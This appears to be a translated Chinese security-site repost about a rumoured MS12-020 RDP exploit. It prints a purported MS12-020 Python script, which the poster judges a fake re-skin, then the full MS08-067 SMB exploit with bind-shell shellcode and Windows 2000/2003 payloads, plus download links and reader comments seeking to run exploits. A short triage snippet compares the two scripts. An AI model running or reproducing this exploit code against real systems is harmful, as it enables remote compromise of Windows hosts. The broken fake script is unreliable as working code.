MS12-020 Exp, MS12-020.exe, MS12-020 exploit program

admin, 2021-04-03 20:02:10, 148 views, 12561 characters

2012-03-17 07:21:11 addendum: the real exploit has now appeared, see: A non-professional analysis of MS12-020 [with the real ruby exploit script]


Since the "MS12-020 Remote Desktop (RDP) remote code execution vulnerability" came out the day before yesterday, several versions of an "exploit" have been circulating online: a batch-file version, a py version, and now this one. The content below is reposted from the internet; its authenticity has not been tested, so judge for yourself!

It looks fake: by eye it is just that py script, and it is extremely similar to the code for a 2008 vulnerability: http://www.1337day.com/exploits/9303


FREERDP must be installed

This seems to be the ms12-020 exp everyone has been searching so hard for

Download: http://115.com/file/anmgwyzh

Video: http://good.gd/1975261.htm

FREERDP module: https://github.com/FreeRDP/FreeRDP/downloads

Reposted from Dis9


MS12-020: Vulnerability in Remote Desktop Could Allow Remote Code Execution


This is the py version of the ms12-020 exp code circulating online:

#!/usr/bin/env python
#############################################################################
#   MS12-020 Exploi
#
#   Uses FreeRDP
#############################################################################

import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import  rdpNego

#bind shellcode TCP port 4444
shellcode  = 'x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode += 'x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exe9'
shellcode += 'x4axb6xa9x83xeexfcxe2xf4x15x20x5dxe4x01xb3x49x56'
shellcode += 'x16x2ax3dxc5xcdx6ex3dxecxd5xc1xcaxacx91x4bx59x22'
shellcode += 'xa6x52x3dxf6xc9x4bx5dxe0x62x7ex3dxa8x07x7bx76x30'
shellcode += 'x45xcex76xddxeex8bx7cxa4xe8x88x5dx5dxd2x1ex92x81'
shellcode += 'x9cxafx3dxf6xcdx4bx5dxcfx62x46xfdx22xb6x56xb7x42'
shellcode += 'xeax66x3dx20x85x6exaaxc8x2ax7bx6dxcdx62x09x86x22'
shellcode += 'xa9x46x3dxd9xf5xe7x3dxe9xe1x14xdex27xa7x44x5axf9'
shellcode += 'x16x9cxd0xfax8fx22x85x9bx81x3dxc5x9bxb6x1ex49x79'
shellcode += 'x81x81x5bx55xd2x1ax49x7fxb6xc3x53xcfx68xa7xbexab'
shellcode += 'xbcx20xb4x56x39x22x6fxa0x1cxe7xe1x56x3fx19xe5xfa'
shellcode += 'xbax19xf5xfaxaax19x49x79x8fx22xa7xf5x8fx19x3fx48'
shellcode += 'x7cx22x12xb3x99x8dxe1x56x3fx20xa6xf8xbcxb5x66xc1'
shellcode += 'x4dxe7x98x40xbexb5x60xfaxbcxb5x66xc1x0cx03x30xe0'
shellcode += 'xbexb5x60xf9xbdx1exe3x56x39xd9xdex4ex90x8cxcfxfe'
shellcode += 'x16x9cxe3x56x39x2cxdcxcdx8fx22xd5xc4x60xafxdcxf9'
shellcode += 'xb0x63x7ax20x0ex20xf2x20x0bx7bx76x5ax43xb4xf4x84'
shellcode += 'x17x08x9ax3ax64x30x8ex02x42xe1xdexdbx17xf9xa0x56'
shellcode += 'x9cx0ex49x7fxb2x1dxe4xf8xb8x1bxdcxa8xb8x1bxe3xf8'
shellcode += 'x16x9axdex04x30x4fx78xfax16x9cxdcx56x16x7dx49x79'
shellcode += 'x62x1dx4ax2ax2dx2ex49x7fxbbxb5x66xc1x19xc0xb2xf6'
shellcode += 'xbaxb5x60x56x39x4axb6xa9'

#Payload
payload  = 'x41x00x5cx00'
payload += 'xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49'
payload += 'x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax68'
payload += 'x58x30x41x31x50x42x41x6bx42x41x78x42x32x42x41x32'
payload += 'x41x41x30x41x41x58x38x42x42x50x75x4bx59x49x6cx43'
payload += 'x5ax7ax4bx32x6dx5ax48x5ax59x69x6fx4bx4fx39x6fx71'
payload += 'x70x6ex6bx62x4cx44x64x71x34x4cx4bx62x65x75x6cx4c'
payload += 'x4bx63x4cx76x65x70x78x35x51x48x6fx6cx4bx50x4fx74'
payload += 'x58x6ex6bx33x6fx55x70x37x71x48x6bx57x39x6cx4bx66'
payload += 'x54x6ex6bx46x61x7ax4ex47x41x6bx70x7ax39x4cx6cx4c'
payload += 'x44x6fx30x62x54x44x47x38x41x4bx7ax54x4dx44x41x4b'
payload += 'x72x78x6bx39x64x35x6bx53x64x75x74x46x48x72x55x79'
payload += 'x75x6cx4bx53x6fx76x44x44x41x48x6bx35x36x4ex6bx54'
payload += 'x4cx30x4bx6cx4bx51x4fx65x4cx65x51x38x6bx77x73x36'
payload += 'x4cx4ex6bx6ex69x30x6cx66x44x45x4cx30x61x69x53x30'
payload += 'x31x79x4bx43x54x6cx4bx63x73x44x70x4ex6bx77x30x66'
payload += 'x6cx6cx4bx72x50x45x4cx4cx6dx4ex6bx73x70x64x48x73'
payload += 'x6ex55x38x6ex6ex32x6ex34x4ex58x6cx62x70x39x6fx6b'
payload += 'x66x70x66x61x43x52x46x71x78x30x33x55x62x63x58x63'
payload += 'x47x34x33x65x62x41x4fx30x54x39x6fx4ax70x52x48x5a'
payload += 'x6bx38x6dx6bx4cx75x6bx30x50x6bx4fx6ex36x53x6fx6f'
payload += 'x79x4ax45x32x46x6fx71x6ax4dx34x48x77x72x73x65x73'
payload += 'x5ax37x72x69x6fx58x50x52x48x4ex39x76x69x4ax55x4c'
payload += 'x6dx32x77x69x6fx59x46x50x53x43x63x41x43x70x53x70'
payload += 'x53x43x73x50x53x62x63x70x53x79x6fx6ax70x35x36x61'
payload += 'x78x71x32x78x38x71x76x30x53x4bx39x69x71x4dx45x33'
payload += 'x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46x32'
payload += 'x4ax56x70x66x31x76x35x59x6fx58x50x32x48x4dx74x4e'
payload += 'x4dx66x4ex7ax49x50x57x6bx4fx6ex36x46x33x56x35x39'
payload += 'x6fx78x50x33x58x6bx55x51x59x4ex66x50x49x51x47x39'
payload += 'x6fx48x56x32x70x32x74x62x74x46x35x4bx4fx38x50x6e'
payload += 'x73x55x38x4dx37x71x69x69x56x71x69x61x47x6bx4fx6e'
payload += 'x36x36x35x79x6fx6ax70x55x36x31x7ax71x74x32x46x51'
payload += 'x78x52x43x70x6dx4fx79x4dx35x72x4ax66x30x42x79x64'
payload += 'x69x7ax6cx4bx39x48x67x62x4ax57x34x4fx79x6dx32x37'
payload += 'x41x6bx70x7ax53x6ex4ax69x6ex32x62x46x4dx6bx4ex70'
payload += 'x42x44x6cx4cx53x6ex6dx31x6ax64x78x4cx6bx4ex4bx4e'
payload += 'x4bx43x58x70x72x69x6ex6dx63x37x66x79x6fx63x45x73'
payload += 'x74x4bx4fx7ax76x63x6bx31x47x72x72x41x41x50x51x61'
payload += 'x41x70x6ax63x31x41x41x46x31x71x45x51x41x4bx4fx78'
payload += 'x50x52x48x4cx6dx79x49x54x45x38x4ex53x63x6bx4fx6e'
payload += 'x36x30x6ax49x6fx6bx4fx70x37x4bx4fx4ex30x4ex6bx30'
payload += 'x57x69x6cx6bx33x4bx74x62x44x79x6fx6bx66x66x32x6b'
payload += 'x4fx4ex30x53x58x58x70x4ex6ax55x54x41x4fx52x73x4b'
payload += 'x4fx69x46x4bx4fx6ex30x68';

class SRVSVC_Exploit(Thread):
    def __init__(self, target, port=3389):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target

    def __DCEPacket(self):
        print '[-]Connecting'
        self.__trans = rdp.transport.cert('rdp_np:%s\x00\x89]' % self.target)
        self.__trans.connect()
        print '[-]connected' % self.target

        # Making teh packet
        self.__stub='x01x00x00x00'
        self.__stub+='xd6x00x00x00x00x00x00x00xd6x00x00x00'
        self.__stub+=shellcode
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x00x00x00x00'
        self.__stub+='x2fx00x00x00x00x00x00x00x2fx00x00x00'
        self.__stub+=payload
        self.__stub+='x00x00x00x00'
        self.__stub+='x02x00x00x00x02x00x00x00'
        self.__stub+='x00x00x00x00x02x00x00x00'
        self.__stub+='x5cx00x00x00x01x00x00x00'
        self.__stub+='x01x00x00x00x90x90xb0x53x6bxC0x28x03xd8xffxd3'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        print '[-]Exploit successfull!...nTelnet to port 4444 on target machine.'

if __name__ == '__main__':
      	target = sys.argv[1]
      	print 'nUsage: %s  n' % sys.argv[0]
        sys.exit(-1)

current = SRVSVC_Exploit(target)
current.start()

This is the py code for that 2008 vulnerability; by eye the two are extremely similar. MS Windows Server Service Code Execution Exploit (MS08-067):

====================================================================
MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)
====================================================================

#!/usr/bin/env python
#############################################################################
#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
#   www.hackingspirits.com
#   www.coffeeandsecurity.com
#   Email: d3basis.m0hanty @ gmail.com
#############################################################################

import struct
import sys

from threading import Thread    #Thread is imported incase you would like to modify
                                #the src to run against multiple targets.

try:
    from impacket import smb
    from impacket import uuid
    from impacket.dcerpc import dcerpc
    from impacket.dcerpc import transport
except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
    print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
    sys.exit(1)


print '#######################################################################'
print '#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '#   www.hackingspirits.com'
print '#   www.coffeeandsecurity.com'
print '#   Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################n'


#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode  = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
shellcode += "x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exe9"
shellcode += "x4axb6xa9x83xeexfcxe2xf4x15x20x5dxe4x01xb3x49x56"
shellcode += "x16x2ax3dxc5xcdx6ex3dxecxd5xc1xcaxacx91x4bx59x22"
shellcode += "xa6x52x3dxf6xc9x4bx5dxe0x62x7ex3dxa8x07x7bx76x30"
shellcode += "x45xcex76xddxeex8bx7cxa4xe8x88x5dx5dxd2x1ex92x81"
shellcode += "x9cxafx3dxf6xcdx4bx5dxcfx62x46xfdx22xb6x56xb7x42"
shellcode += "xeax66x3dx20x85x6exaaxc8x2ax7bx6dxcdx62x09x86x22"
shellcode += "xa9x46x3dxd9xf5xe7x3dxe9xe1x14xdex27xa7x44x5axf9"
shellcode += "x16x9cxd0xfax8fx22x85x9bx81x3dxc5x9bxb6x1ex49x79"
shellcode += "x81x81x5bx55xd2x1ax49x7fxb6xc3x53xcfx68xa7xbexab"
shellcode += "xbcx20xb4x56x39x22x6fxa0x1cxe7xe1x56x3fx19xe5xfa"
shellcode += "xbax19xf5xfaxaax19x49x79x8fx22xa7xf5x8fx19x3fx48"
shellcode += "x7cx22x12xb3x99x8dxe1x56x3fx20xa6xf8xbcxb5x66xc1"
shellcode += "x4dxe7x98x40xbexb5x60xfaxbcxb5x66xc1x0cx03x30xe0"
shellcode += "xbexb5x60xf9xbdx1exe3x56x39xd9xdex4ex90x8cxcfxfe"
shellcode += "x16x9cxe3x56x39x2cxdcxcdx8fx22xd5xc4x60xafxdcxf9"
shellcode += "xb0x63x7ax20x0ex20xf2x20x0bx7bx76x5ax43xb4xf4x84"
shellcode += "x17x08x9ax3ax64x30x8ex02x42xe1xdexdbx17xf9xa0x56"
shellcode += "x9cx0ex49x7fxb2x1dxe4xf8xb8x1bxdcxa8xb8x1bxe3xf8"
shellcode += "x16x9axdex04x30x4fx78xfax16x9cxdcx56x16x7dx49x79"
shellcode += "x62x1dx4ax2ax2dx2ex49x7fxbbxb5x66xc1x19xc0xb2xf6"
shellcode += "xbaxb5x60x56x39x4axb6xa9"


#Payload for Windows 2000 target
payload_1='x41x00x5cx00x2ex00x2ex00x5cx00x2ex00x2ex00x5cx00'
payload_1+='x41x41x41x41x41x41x41x41'
payload_1+='x41x41x41x41x41x41x41x41'
payload_1+='x41x41'
payload_1+='x2fx68x18x00x8bxc4x66x05x94x04x8bx00xffxe0'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='xebxcc'
payload_1+='x00x00'

#Payload for Windows 2003[SP2] target
payload_2='x41x00x5cx00'
payload_2+='x2ex00x2ex00x5cx00x2ex00'
payload_2+='x2ex00x5cx00x0ax32xbbx77'
payload_2+='x8bxc4x66x05x60x04x8bx00'
payload_2+='x50xffxd6xffxe0x42x84xae'
payload_2+='xbbx77xffxffxffxffx01x00'
payload_2+='x01x00x01x00x01x00x43x43'
payload_2+='x43x43x37x48xbbx77xf5xff'
payload_2+='xffxffxd1x29xbcx77xf4x75'
payload_2+='xbdx77x44x44x44x44x9exf5'
payload_2+='xbbx77x54x13xbfx77x37xc6'
payload_2+='xbax77xf9x75xbdx77x00x00'


if sys.argv[2]=='1':    #Windows 2000 Payload
    payload=payload_1
    print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2':    #Windows 2003[SP2] Payload
    payload=payload_2
    print '[-]Windows 2003[SP2] payload loaded'


class SRVSVC_Exploit(Thread):
    def __init__(self, target, osver, port=445):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target
        self.osver   = osver

    def __DCEPacket(self):
        print '[-]Initiating connection'
        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\pipe\browser]' % self.target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\pipe\browser]' % self.target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
        
        # Constructing Malicious Packet
        self.__stub='x01x00x00x00'
        self.__stub+='xd6x00x00x00x00x00x00x00xd6x00x00x00'
        self.__stub+=shellcode
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x00x00x00x00'
        self.__stub+='x2fx00x00x00x00x00x00x00x2fx00x00x00'
        self.__stub+=payload
        self.__stub+='x00x00x00x00'
        self.__stub+='x02x00x00x00x02x00x00x00'
        self.__stub+='x00x00x00x00x02x00x00x00'
        self.__stub+='x5cx00x00x00x01x00x00x00'
        self.__stub+='x01x00x00x00'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)   #0x1f (or 31)- NetPathCanonicalize Operation
        print '[-]Exploit sent to target successfully...n[1]Telnet to port 4444 on target machine...'

if __name__ == '__main__':
       try:
               target = sys.argv[1]
               osver = sys.argv[2]
       except IndexError:
               print 'nUsage: %s n' % sys.argv[0]
               print 'Example: srvsvcexpl.py 192.168.1.1 2n'
               print 'Select OS Version'
               print '[-]Windows 2000: OS Version = 1'
               print '[-]Windows 2003[SP2]: OS Version = 2'

               sys.exit(-1)

current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...n[-]Telnet to port 4444 on target machine...'

# 1337day.com [2008-11-16]
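As an added illustration of the comparison above (not code from the page or from either script's author): a small static triage that joins each script's `=`/`+=` string fragments and reports identical blobs, the reused class name, and the tell-tale SRVSVC opnum call in a script that claims to target RDP. The two embedded scripts are constructed, abbreviated stand-ins with placeholder bytes.

```python
import re
from typing import Dict, List

# Constructed, abbreviated stand-ins for the two scripts (placeholder bytes).
CLAIMED_MS12_020 = '''
from freerdp import rdpRdp
shellcode  = 'x90x90x90x90'
shellcode += 'x29xc9x83xe9'
class SRVSVC_Exploit(Thread):
    def __init__(self, target, port=3389):
        pass
    def run(self):
        self.__dce.call(0x1f, self.__stub)
'''
MS08_067 = '''
from impacket.dcerpc import dcerpc
shellcode  = "x90x90x90x90"
shellcode += "x29xc9x83xe9"
class SRVSVC_Exploit(Thread):
    def __init__(self, target, osver, port=445):
        pass
    def run(self):
        self.__dce.call(0x1f, self.__stub)  # NetPathCanonicalize
'''
# Matches `name = '...'` or `name += "..."` on a single line.
LITERAL_RE = re.compile(r'^\s*(\w+)\s*\+?=\s*(["\'])(.*?)\2\s*$')

def concat_literals(src: str) -> Dict[str, str]:
    """Join the string pieces assigned to each variable with = and +=.
    Regex, not ast: the page's scripts are Python 2 and would not parse."""
    out: Dict[str, str] = {}
    for line in src.splitlines():
        m = LITERAL_RE.match(line)
        if m:
            name, _, piece = m.groups()
            out[name] = out.get(name, '') + piece
    return out

def triage(claimed: str, known: str) -> List[str]:
    """Findings suggesting `claimed` is a re-skin of the `known` exploit."""
    a, b = concat_literals(claimed), concat_literals(known)
    findings = [f'{v} identical ({len(a[v])} chars)'
                for v in sorted(set(a) & set(b)) if a[v] == b[v]]
    # An RDP (freerdp, port 3389) script that still issues the SRVSVC
    # NetPathCanonicalize call (opnum 0x1f) has kept the MS08-067 skeleton.
    if 'freerdp' in claimed and re.search(r'\.call\(0x1f\b', claimed):
        findings.append('claims RDP but calls DCERPC opnum 0x1f (SRVSVC)')
    if 'class SRVSVC_Exploit' in claimed and 'class SRVSVC_Exploit' in known:
        findings.append('same class name SRVSVC_Exploit')
    return findings
```

Run `triage(CLAIMED_MS12_020, MS08_067)` to get the list of findings; an empty list means no overlap was detected.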

Comments (old system):

[Anonymous] @ 2012-03-15 16:53:07

Isn't this not the .exe version?? I don't know how to use the .py one. Boss, can you turn it into an .exe?

Site reply:

Damn, don't you know py can be compiled...

[Anonymous] @ 2012-03-15 17:11:44

Why are all the screenshots posted everywhere of this .exe, while the exp that gets posted is always this .py? Why isn't it the .exe from the picture? So frustrating.

Site reply:

I have no idea either; fakes everywhere......

[Anonymous] @ 2012-03-15 17:19:19

I have no Linux environment; how do I run a .py on Windows? Please advise, boss!

Site reply:

py has official installers for download that fully support Windows; search for the details. I have used py on Win XP and Win 7 before.

[Anonymous] @ 2012-03-15 17:32:27

Boss, have you tested this exp? If so, how did it go?

Site reply:

I haven't tested it at all; it's 90% fake, all kinds of fake versions are flying around....

[Anonymous] @ 2012-03-15 17:39:13

I installed python and ran it to see

C:>ms12-020.py
File "C:ms12-020.py", line 93
print '[-]Connecting'
^
SyntaxError: invalid syntax

Seems to have an error... I guess it's fake too. Sigh, a vulnerability comes out and I can't make the exp myself, so depressing.

Site reply:

That error message means: syntax error. I don't know py very well; look up the specifics online.

[Anonymous] @ 2012-03-16 22:02:46

Pure bullshit ~~~~ only an idiot would believe it; even if a 3389 0day existed it would be in the military's hands

Site reply:

The vulnerability is real and a 0day does exist, but everything circulating online right now is fake; the real one leaking out is only a matter of time.

Anonymous @ 2013-04-11 08:48:17

This was really popular last year. 核总 has everything here -_-.
Seems that changing the 3389 port makes the attack fail, is that right?

Site reply:

Changing the port makes no difference at all.

Source: lcx.cc: MS12-020 Exp, MS12-020.exe, MS12-020 exploit program

Published by admin on 2021-04-03 20:02:10. Please keep this link when reposting (CN-SEC Chinese site; thanks to the original author): MS12-020 Exp, MS12-020.exe, MS12-020 exploit program https://cn-sec.com/archives/324994.html
